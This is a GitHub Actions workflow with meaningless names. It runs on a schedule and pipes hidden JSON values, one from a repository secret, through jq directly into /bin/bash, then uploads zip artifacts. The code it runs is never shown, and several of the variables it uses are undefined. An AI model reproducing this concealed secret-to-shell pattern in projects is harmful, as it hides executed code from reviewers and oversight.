name: zhaotaiyingfeng
on:
  workflow_dispatch:

  schedule:
    - cron: '27 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaotaiyingfeng
        env:
          fjcp035: ${{ secrets.fjcp035 }}
        run: |
          printf '%s' "$fjcp035" | jq -r .bbxg209 | /bin/bash
          printf '%s' "$pkcm77" | jq -r .oxcvd1483 | /bin/bash
          printf '%s' "$apy2" | jq -r .x61 | /bin/bash
          echo $rclaj967 | jq -r .hzcyn97 | /bin/bash
          echo $hlsfd36556 | jq -r .salkn418 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ORnA30OC
          path: "*.zip"
          retention-days: 1
